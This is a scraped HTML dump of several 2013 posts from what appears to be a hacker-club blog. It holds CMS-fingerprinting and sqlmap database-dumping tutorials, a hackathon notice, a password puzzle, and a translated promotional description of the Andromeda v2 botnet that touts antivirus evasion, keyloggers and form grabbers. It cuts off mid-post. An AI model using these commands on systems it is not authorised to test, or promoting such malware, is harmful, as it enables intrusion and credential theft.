<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTETUizQXpbM8Bfzd3U7pjUkfsgSbv2hY0k0a7F36i1jtECfu8TJtxmEk24ug4LJnKr3prNgYLtVZLymAyncT5eHetK0k7sEnmPnuzjfQ6bLTWCkB-GL4oE_gBGG3Dn2mmS6B-uV1EQcCt/s1600/26.jpg" imageanchor="1" style="border: none; margin-left: 1em; margin-right: 1em; outline: none;"><span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTETUizQXpbM8Bfzd3U7pjUkfsgSbv2hY0k0a7F36i1jtECfu8TJtxmEk24ug4LJnKr3prNgYLtVZLymAyncT5eHetK0k7sEnmPnuzjfQ6bLTWCkB-GL4oE_gBGG3Dn2mmS6B-uV1EQcCt/s400/26.jpg" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="400" /></span></a></div>
<div>
<span class="Apple-style-span" style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="color: #f3f3f3;"><br /></span></div>
<div style="clear: both;">
</div>
<div class="post-share-buttons" style="display: inline-block; margin-top: 0.5em; vertical-align: middle;">
<span class="share-button-link-text" style="color: #f3f3f3; display: block; font-family: Verdana, sans-serif; text-indent: -9999px;">Email Th</span></div>
</div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-33027663779745906772013-07-26T09:36:00.000-04:002013-07-26T09:36:36.638-04:00BlindElephant - Backtrak 5<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #f6b26b; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">CMS IDENTICICATION USING BLINDELEPHANT</span></div>
<div style="text-align: center;">
<span style="color: #f6b26b; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span></div>
<div style="background-color: transparent; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px; text-align: justify;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><strong style="margin: 0px; padding: 0px;"><br /></strong></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><strong style="margin: 0px; padding: 0px;">BlindElephant </strong>tools Web Application Fingerprinter. With <strong style="margin: 0px; padding: 0px;">BlindElephant </strong>we can find Web application that is running on a website. The workings of this <strong style="margin: 0px; padding: 0px;">BlindElephant</strong> is trying to read static files or configuration of Web applications. BlindElephant also can find the web version of the application is running, so that will help us in the search for target information. By knowing the version of the web application, we can look for weaknesses in the web version.</span></div>
<div style="background-color: transparent; color: #333333; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<span style="margin: 0px; padding: 0px;"><span style="color: red; font-family: Verdana, sans-serif; margin: 0px; padding: 0px;">Backtrack–>Information Gathering—> Web Application Analys–>Cms Identification–>BlindElephant</span></span></div>
<div style="background-color: transparent; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<span style="color: lime; font-family: Verdana, sans-serif;"># ./blindelephant.py [option] url appName</span></div>
<div style="background-color: transparent; color: #333333; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<a href="http://indonetworksecurity.com/website-security/blind-elephant-backtrack.htm/attachment/blindelephant1" rel="attachment wp-att-1553" style="background-color: #e8e8e8; background-position: initial initial; background-repeat: initial initial; color: #333333; margin: 0px; padding: 0px; text-decoration: none;"><img alt="" class="aligncenter size-full wp-image-1553" height="314" src="http://indonetworksecurity.com/wp-content/uploads/2013/02/blindelephant1.png" style="border: none; margin: 0px; max-width: 100%; padding: 0px;" title="blindelephant1" width="636" /></a></div>
<div style="background-color: transparent; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<div style="color: #333333; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px;">
<br /></div>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;">1. scanning Wordpress.</span></span></div>
<div style="background-color: transparent; color: #333333; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<a href="http://indonetworksecurity.com/website-security/blind-elephant-backtrack.htm/attachment/blindelephant2" rel="attachment wp-att-1554" style="background-color: #e8e8e8; background-position: initial initial; background-repeat: initial initial; color: #333333; margin: 0px; padding: 0px; text-decoration: none;"><img alt="" class="aligncenter size-full wp-image-1554" height="404" src="http://indonetworksecurity.com/wp-content/uploads/2013/02/blindelephant2.png" style="border: none; margin: 0px; max-width: 100%; padding: 0px;" title="blindelephant2" width="639" /></a></div>
<div style="background-color: transparent; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<div style="color: #333333; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px;">
<br /></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">2. scanning drupal.</span></div>
<div style="background-color: transparent; color: #333333; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<a href="http://indonetworksecurity.com/website-security/blind-elephant-backtrack.htm/attachment/scan-drupal" rel="attachment wp-att-1555" style="background-color: #e8e8e8; background-position: initial initial; background-repeat: initial initial; color: #333333; margin: 0px; padding: 0px; text-decoration: none;"><img alt="" class="aligncenter size-large wp-image-1555" height="657" src="http://indonetworksecurity.com/wp-content/uploads/2013/02/scan-drupal-1024x657.png" style="border: none; margin: 0px; max-width: 100%; padding: 0px;" title="scan drupal" width="1024" /></a></div>
<div style="background-color: transparent; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">3. scanning joomla.</span></div>
<div style="background-color: transparent; color: #333333; font-family: Georgia, 'Times New Roman', Times, serif; font-size: 13px; line-height: 19.984375px; margin-bottom: 1.53846em; padding: 0px;">
<a href="http://indonetworksecurity.com/website-security/blind-elephant-backtrack.htm/attachment/scan-joomla" rel="attachment wp-att-1556" style="background-color: #e8e8e8; background-position: initial initial; background-repeat: initial initial; color: #333333; margin: 0px; padding: 0px; text-decoration: none;"><img alt="" class="aligncenter size-full wp-image-1556" height="648" src="http://indonetworksecurity.com/wp-content/uploads/2013/02/scan-joomla.png" style="border: none; margin: 0px; max-width: 100%; padding: 0px;" title="scan joomla" width="585" /></a><br />
<br /></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com3tag:blogger.com,1999:blog-5858162330672279498.post-16260115082063697502013-07-13T12:42:00.002-04:002013-07-19T05:19:01.454-04:00E-HACK 2013<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: magenta; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">EHACK IN CHENNAI</span></div>
<div style="text-align: center;">
<span style="color: magenta; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span>
<span style="color: magenta; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span>
<img src="http://www.symposiumz.net/wp-content/blogs.dir/1/files/ehack-2013.png" /><br />
<span style="color: magenta; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span>
<span style="color: magenta; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #f1c232; font-family: Verdana, sans-serif; font-size: small;"><br /></span></div>
<div style="text-align: left;">
<span style="color: #f1c232; font-family: Verdana, sans-serif; font-size: small;">
About E-HACK :</span></div>
<div class="MsoNormal" style="background-color: transparent; line-height: 28px; margin-bottom: 1.5em; margin-top: 0.5em; text-align: left;">
<span lang="EN-IN" style="color: #f3f3f3; font-family: Verdana, sans-serif;">Temple Run guy’s running never ends. The same happens for security experts and hackers. Everyday it’s a clash of titans between the two which never ends. But there will be clash of stalwarts with an end and it is called as E-HACK. It will be world largest attempt on hackathon with brain twisting levels and stages, the continuous run for 24 hours non-stop. Starting with easier levels, the hackathon will continue to be a challenging with over 50 levels.</span></div>
<div class="MsoNormal" style="background-color: transparent; line-height: 28px; margin-bottom: 1.5em; margin-top: 0.5em; text-align: left;">
<span lang="EN-IN" style="color: #f3f3f3; font-family: Verdana, sans-serif;">Meddle in cyber-warfare, battle with our machine master mind who will throw challenges on web application security, network security, algorithms, reverse engineering and decryption. The team which cracks the final level will attain the glory of being Winner at our E-HACK Guinness record attempt with tons of prizes waiting. Be simple but not simpler is quote by Einstein, that’s secret of success for E-HACK. Be there to witness the epic battle of brains.</span></div>
<div class="MsoNormal" style="background-color: transparent; line-height: 28px; margin-bottom: 1.5em; margin-top: 0.5em; text-align: left;">
<span lang="EN-IN" style="color: #f3f3f3; font-family: Verdana, sans-serif;">P.S: World renowned web security experts will be watching you at E-HACK, who knows you might end up working for them, prove you’re potential.</span></div>
<div class="MsoNormal" style="background-color: transparent; line-height: 28px; margin-bottom: 1.5em; margin-top: 0.5em; text-align: left;">
<span style="font-family: Verdana, sans-serif; line-height: normal;"><span style="color: #f1c232;">About E-HACK in Chennai:</span></span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><span lang="EN-IN">Chennai is the city through which India’s primary Internet backbone cable runs into land from sea. This Techno-wizard city has something to do with hacking. Yes it just got easier and better because the city is welcoming legendary teachers and pioneers to educate</span><span lang="EN-IN"> you to hack </span><span lang="EN-IN">your way </span><span lang="EN-IN">through any information</span><span lang="EN-IN">system ever invented. E hack is just not any other workshop it is the place to be if you want to keep your information discreet. The pioneers are going to be here in your city to make </span><span lang="EN-IN">you</span><span lang="EN-IN"> Professional Hackers.</span></span></div>
<div style="text-align: left;">
<span style="color: #f1c232; font-family: Verdana, sans-serif; font-size: small;">
WHAT IS CTF?</span></div>
<div class="MsoNormal" style="background-color: transparent; line-height: 28px; margin-bottom: 1.5em; margin-top: 0.5em; text-align: left;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">Capture the Flag (CTF) is a real time scenario game. You’ll be given a scenario which will require you to hack into a server/site. There will be multiple levels and you have to progress through each level by hacking through it. For instance the first level will need a password to enter, so you’ll have to identify the password and progress to the next level. It’s not going to be straight forward like this, it’s just an example. With a total of 50 levels, the team/person which cracks the maximum number of levels within the time limit, will be announced the winner.</span></div>
<div class="MsoNormal" style="background-color: transparent; line-height: 28px; margin-bottom: 1.5em; margin-top: 0.5em; text-align: left;">
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">The first couple of levels are bound to be easier because of the training provided throughout day 1, but in the later levels you’ll be facing things which you might’ve never faced before like a combination of hacks for instance. There will be a live leader board which will be reflecting the performance of each and every team. That will heat up the contest more. Amidst all this, social engineering is totally allowed and please do have fights but only online! Use of fists not allowed!! </span></div>
<div class="MsoNormal" style="-webkit-text-stroke-width: 0px; background-color: transparent; color: #555555; font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 28px; margin: 0.5em 0px 1.5em; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="MsoNormal">
<span style="color: orange; font-family: Verdana, sans-serif;">VENUE:</span></div>
<div class="MsoNormal">
<span style="color: #ffd966; font-family: Verdana, sans-serif;">SRM Nagar, </span><br />
<span style="color: #ffd966; font-family: Verdana, sans-serif;">Kattankulathur - 603 203, </span><br />
<span style="color: #ffd966; font-family: Verdana, sans-serif;">Kancheepuram District, Tamil Nadu.</span></div>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><br /></span>
<span style="color: orange; font-family: Verdana, sans-serif;">Register <a href="http://www.ehack.in/index.php/tickets" target="_blank">here</a></span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><br /></span>
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><br /></span>
<span style="color: #e06666; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">FOR CHENNAI HACKERS MEMBERS ALONE:</span><br />
<span style="font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;"><br /></span>
<span style="color: lime; font-family: Verdana, sans-serif;">IF U DON'T HAVE TEAM U CAN ALSO REGISTER WITH CHENNAI HACKERS TEAM JUST COMMENT YOUR DETAILS WITH MAIL ID.AFTER REGISTRATION THE TICKET NUMBER WILL BE MAILED TO U.</span><br />
<span style="color: lime; font-family: Verdana, sans-serif;"><br /></span></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-22561263568942032952013-07-12T10:02:00.001-04:002013-08-09T15:49:08.697-04:00Sql Injection with SqlMap - Backtrack<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #e06666; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">Hacking sql database using SqlMap</span></div>
<div class="post-header" style="background-color: transparent; font-family: Arial, serif; font-size: 14px;">
<div class="post-header-line-1">
</div>
</div>
<div class="post-body entry-content" id="post-body-2461673672159886499" itemprop="description articleBody" style="background-color: transparent; line-height: 1.6em; margin: 0px 0px 0.75em;">
<div class="separator" style="clear: both; font-family: Arial, serif; font-size: 14px;">
<br /></div>
<div class="separator" style="clear: both; font-family: Arial, serif; font-size: 14px;">
<span style="font-family: 'Courier New', Courier, monospace;"><b><br /></b></span></div>
<div class="separator" style="clear: both; font-family: Arial, serif; font-size: 14px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8UZbU1hfukHf8sHHPNf6MoVn5sISQyuAP9ediQ7pyX6t8tHN0D7HChvWT0fZpluEY-qp1RFrwziW4awP4HzAUySMv6k84HEM211BsztEJlwaa4tdMW1Fgca07NVxGF1nqGYtvW_GLdtA/s1600/1.png" imageanchor="1" style="color: #fc8901; margin-left: 1em; margin-right: 1em; text-align: center; text-decoration: none;"><img 2px="" border="0" height="200" padding:="" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8UZbU1hfukHf8sHHPNf6MoVn5sISQyuAP9ediQ7pyX6t8tHN0D7HChvWT0fZpluEY-qp1RFrwziW4awP4HzAUySMv6k84HEM211BsztEJlwaa4tdMW1Fgca07NVxGF1nqGYtvW_GLdtA/s200/1.png" width="200" /></a></div>
<div class="" style="clear: both;">
<b><span class=""></span></b><br />
<div class="" style="clear: both; font-family: 'Courier New', Courier, monospace; font-size: 14px;">
<b><span class=""><span style="font-family: 'Courier New', Courier, monospace;"><b><span class=""><br /></span></b></span></span></b></div>
<b><span class="">
</span></b>
<br />
<div style="text-align: left;">
<span style="color: #f3f3f3;"><b><span class=""><span style="font-family: Verdana, sans-serif;">SqlMap</span></span></b><span style="font-family: Verdana, sans-serif;"><span class=""> is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. </span>It comes with a powerful detection engine, many niche features for maximum penetration tester and a broad range of switches lasting fingerprint database, more data Search the database to access the file system underlying and executing commands on the operating system via out-of-band connections.</span><span style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<span style="color: #f3f3f3;"><span style="font-family: Verdana, sans-serif;"><br /></span></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span><span style="color: #f6b26b; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: large;">Some basic options. </span></div>
<span style="font-family: 'Courier New', Courier, monospace; font-size: 14px;"><br /></span><span style="color: lime; font-family: Verdana, sans-serif;">./sqlmap.py -u URL --dbs<br />./sqlmap.py URL -D --tables <br />./sqlmap.py URL -D -T --columns<br />./sqlmap.py URL -D -T -C --dump<br /><br />-D: Database<br />-T: Tables<br />-C: Column<br />-U: user custom<br />- table<br />- columns<br />- dump</span><br />
<span style="color: lime; font-family: Verdana, sans-serif;"><br /></span></div>
</div>
CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-33331709526323037422013-06-28T14:22:00.000-04:002013-07-12T10:19:51.505-04:00Find the Pass<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">Hello CHC(Chennai Hackers Connect) Members most of them cracked the previous two challenges.This is challenge gonna be difficult compared to the other two :)<br />Try to find out the password and make a comment .<br />The names of the person who cracks the password will be displayed in Board and FB page :)</span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;">Congrats dude.</span><br />
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<br />
<div style="text-align: center;">
<!-- password:"u_cracked_dude" ! -->
</div>
</div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrdHAS5fwydKM7sG5MBH6rh9CEEsWJEu2HoF1qjQJTSoTZZEXG5MxpbvSLN86wT16axVbgy0YAtej9TKe5OV5vExUIho8Jivin5Bt4S4DX6Rh7sKilezjuFhA_Bb7XVOAVcqYyVnKrTDs/s1117/chc+award.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrdHAS5fwydKM7sG5MBH6rh9CEEsWJEu2HoF1qjQJTSoTZZEXG5MxpbvSLN86wT16axVbgy0YAtej9TKe5OV5vExUIho8Jivin5Bt4S4DX6Rh7sKilezjuFhA_Bb7XVOAVcqYyVnKrTDs/s400/chc+award.png" width="341" /></a></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #e06666;"><span style="font-family: Verdana, sans-serif;">Note</span><span style="font-family: Verdana, sans-serif;"> :</span></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"> </span><span style="color: #f1c232; font-family: Verdana, sans-serif;">Comment the password along with the facebook id or gmail id</span><br />
<span style="color: #f1c232; font-family: Verdana, sans-serif;"><br /></span>
<span style="color: #f1c232; font-family: Verdana, sans-serif;"><br /></span></div>
</div>CHChttp://www.blogger.com/profile/05341889266903644178noreply@blogger.com0tag:blogger.com,1999:blog-5858162330672279498.post-85765531563708273202013-06-27T15:32:00.000-04:002014-03-31T21:53:41.303-04:00Andromeda v2 HTTP Botnet<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: center;">
<span style="color: #c27ba0; font-family: Helvetica Neue, Arial, Helvetica, sans-serif; font-size: x-large;">Andromeda v2 + Todos sus Plugins</span></div>
<div class="post-header" style="background-color: transparent; color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px; line-height: 1.6; margin: 0px 0px 1em;">
<div class="post-header-line-1">
</div>
</div>
<div class="post-body entry-content" id="post-body-7179465343845410352" itemprop="description articleBody" style="background-color: transparent; line-height: 18px; position: relative; width: 586px;">
<span class="" id="result_box" lang="en"><span style="color: white; font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif; font-size: 13px;" title="Andromeda v2 + Todos sus Plugins"><br /></span><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><span title="Truyền thông giữa các bot và bảng điều khiển được mã hóa bằng cách sử dụng RC4."> Communication between the bot and the control panel are encrypted using RC4.</span><span title="Trong tiến trình cài đặt của bạn không cần quyền quản trị hoặc UAC nhảy.">During the installation you do not need administrator privileges or UAC to jump.</span><span title="Quá trình này được bảo vệ để ngăn chặn bot có thể được gỡ bỏ khỏi hệ thống.">This process is protected to prevent bot can be removed from the system.</span><span title="Tường lửa Bypassea và tiêm vào một quá trình đáng tin cậy.">Firewall Bypass and injected into a trusted process.</span><span title="Khi cài đặt đúng, exe sẽ tự động bị xóa.">When properly installed, the exe will automatically be deleted.</span><span title="Nó hoạt động trên hệ thống từ XP lên 7 bao gồm x64.">It works on systems from XP to 7, including x64.</span><span title="Trọng lượng là khoảng 10KB tập tin.">Weight is approximately 10KB file.</span><span title="Bypassea nhiều chủ động chống virus.">Bypass more proactive anti-virus.</span><span title="Andromeda bot">Andromeda bot </span><span title="Mô tả:">Description:</span><span title="Linh hoạt mô-đun bot.">Flexible modules bot. </span><span title="Dựa trên sản phẩm này, bạn có thể xây dựng một mạng botnet với cơ hội vô cùng đa dạng.">Based on this product, you can build a botnet with extremely diverse opportunities. </span><span title="Bot chức năng mở rộng với sự giúp đỡ của các plug-in có thể được nạp đúng số lượng và bất cứ lúc nào.">Bot extended functions with the help of the plug-in can be loaded right quantity and at any time.</span><span title="Không bị hạn chế bởi số lượng các lĩnh vực sao lưu được hỗ trợ.">Not limited by the number of supported backup field.</span><span title="Giao thức truyền thông giữa bot và quản trị được mã hóa bằng cách sử dụng RC4.">Communication protocol between bots and the administrator is encrypted using RC4.</span><span title="Mô-đun.">Modules. </span><span title="Bạn được tự do chuyển đổi botnet của mình với nhu cầu của bạn bất cứ lúc nào.">You are free to convert their botnets for your needs at any time.</span><span title="Hệ thống không agresiven, cài đặt không cần quyền quản trị, UAC không bật lên cửa sổ.">System not agresiven, install without administrator rights, UAC does not pop up the window.</span><span title="Bảo vệ bản thân không chuẩn bị người sử dụng không thể gỡ bỏ bot từ hệ thống.">Protect yourself unprepared users can not remove the bot from the system.</span><span title="Bỏ qua tường lửa, không palitsya trong các quá trình được sử dụng để tiêm một quá trình đáng tin cậy.">Ignored firewall, not palitsya in the processes used to inject a reliable process.</span><span title="Đừng ném mình ra khỏi bất kỳ DLL, không chứa TLS, dễ dàng crypt.">Do not throw out any DLL, not contains TLS, easy crypt.</span><span title="Bất kể sự thành công của exe cài đặt ban đầu bị xóa.">Regardless of the success of the original installation exe deleted.</span><span title="Hoạt động trên dòng từ WinXP đến Win7 bao gồm các hệ thống x64.">Works line from WinXP to Win7, including x64 systems.</span><span title="Kích thước nhỏ, viết hoàn toàn bằng ngôn ngữ lắp ráp.">Small size, written entirely in assembly language.</span></span></span></div>
<div class="post-body entry-content" id="post-body-7179465343845410352" itemprop="description articleBody" style="background-color: transparent; line-height: 18px; position: relative; width: 586px;">
<span class="" lang="en"><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><span title="Kích thước nhỏ, viết hoàn toàn bằng ngôn ngữ lắp ráp."><br /></span><span title="Tổng quan về Ar3s'a">Overview Ar3s'a</span></span></span></div>
<div class="post-body entry-content" id="post-body-7179465343845410352" itemprop="description articleBody" style="background-color: transparent; line-height: 18px; position: relative; width: 586px;">
<span style="color: #f3f3f3;"><span class="" lang="en"><span style="font-family: Verdana, sans-serif;"><span title="Control Panel:">Control Panel:</span><span title="Nó được viết bằng PHP với MySQL.">It is written in PHP with MySQL.</span><span title="Xác định chương trình phía sau NAT.">Identify the program behind NAT.</span><span title="Tính toán số liệu thống kê cho botnet.">Calculate statistics for the botnet. </span><span title="Bots online / offline chương trình / chương trình chết / số liệu thống kê theo quốc gia / số liệu thống kê trên nền tảng.">Bots online / offline program / programs dead / statistics by country / statistics on the platform.</span><span title="Đếm số nhiệm vụ hoàn thành / chưa hoàn thành.">Count the number of tasks completed / not completed.</span><span title="Bạn có thể thiết lập một giới hạn về số lượng công việc hoàn thành.">You can set a limit on the amount of work completed.</span><span title="Bạn có thể cung cấp cho một tài liệu tham khảo cụ thể để bot.">You can give a specific reference to the bot.</span><span title="Sự phân bố các nhiệm vụ giữa các nước.">The distribution of tasks between the countries.</span><span title="Loại bỏ toàn bộ bài viết / gỡ bỏ các khuôn khổ bot chết.">Remove the entire article / remove dead bot framework.</span><span title="Chụp màn hình của bảng quản trị:">Screenshot of the admin panel:</span></span></span><span style="font-family: Verdana, sans-serif;"><br /></span></span><br />
<span style="color: #f3f3f3;"><span class="" lang="en"><span style="font-family: Verdana, sans-serif;"><span title="Chụp màn hình của bảng quản trị:"><br /></span></span></span></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-zRK57CzGGSg/URgOpg5BGxI/AAAAAAAAAGE/qhi7gGgunek/s1600/31553.png" style="margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" src="http://4.bp.blogspot.com/-zRK57CzGGSg/URgOpg5BGxI/AAAAAAAAAGE/qhi7gGgunek/s400/31553.png" height="206" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background-color: #222222; background-position: initial initial; background-repeat: initial initial; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="400" /></span></a></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-BLNRUIQOgPA/URgOpqkYosI/AAAAAAAAAGI/DTemf9gq33c/s1600/31554.png" style="margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" src="http://1.bp.blogspot.com/-BLNRUIQOgPA/URgOpqkYosI/AAAAAAAAAGI/DTemf9gq33c/s400/31554.png" height="206" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background-color: #222222; background-position: initial initial; background-repeat: initial initial; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="400" /></span></a></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-PRMKZZDjH64/URgOqMGTwzI/AAAAAAAAAGQ/Iq-fBzA5zRM/s1600/31555.png" style="margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" src="http://2.bp.blogspot.com/-PRMKZZDjH64/URgOqMGTwzI/AAAAAAAAAGQ/Iq-fBzA5zRM/s400/31555.png" height="206" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background-color: #222222; background-position: initial initial; background-repeat: initial initial; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="400" /></span></a></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-V5w3CjESLr4/URgOqxA0sTI/AAAAAAAAAGY/xvAVKEarXQc/s1600/f584fb.jpg" style="margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span></a></div>
<span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-EeUhSBZeSVI/URgOr8IYxYI/AAAAAAAAAGk/lMf2GGI7hzI/s1600/31556.png" style="margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: #f3f3f3; font-family: Verdana, sans-serif;"><img border="0" src="http://3.bp.blogspot.com/-EeUhSBZeSVI/URgOr8IYxYI/AAAAAAAAAGk/lMf2GGI7hzI/s400/31556.png" height="206" style="-webkit-box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; background-color: #222222; border-bottom-left-radius: 0px; border-bottom-right-radius: 0px; border-top-left-radius: 0px; border-top-right-radius: 0px; border: 1px solid transparent; box-shadow: rgba(0, 0, 0, 0.2) 0px 0px 0px; padding: 8px; position: relative;" width="400" /></span></a></div>
<span style="font-family: Verdana, sans-serif;"><span style="color: #f3f3f3;"><br /><span class="Apple-style-span" style="border-collapse: separate; border-spacing: 0px; line-height: normal;"><span class="Apple-style-span" style="text-align: center;"><br />Este bot viene con varios plugins; socks4, form grabber, keylogger, ring3 rootkit.<br /><br />Aquí una imagen del builder que creó The Old Warrior.</span></span></span></span><br />
<div class="separator" style="clear: both; color: white; text-align: center;">
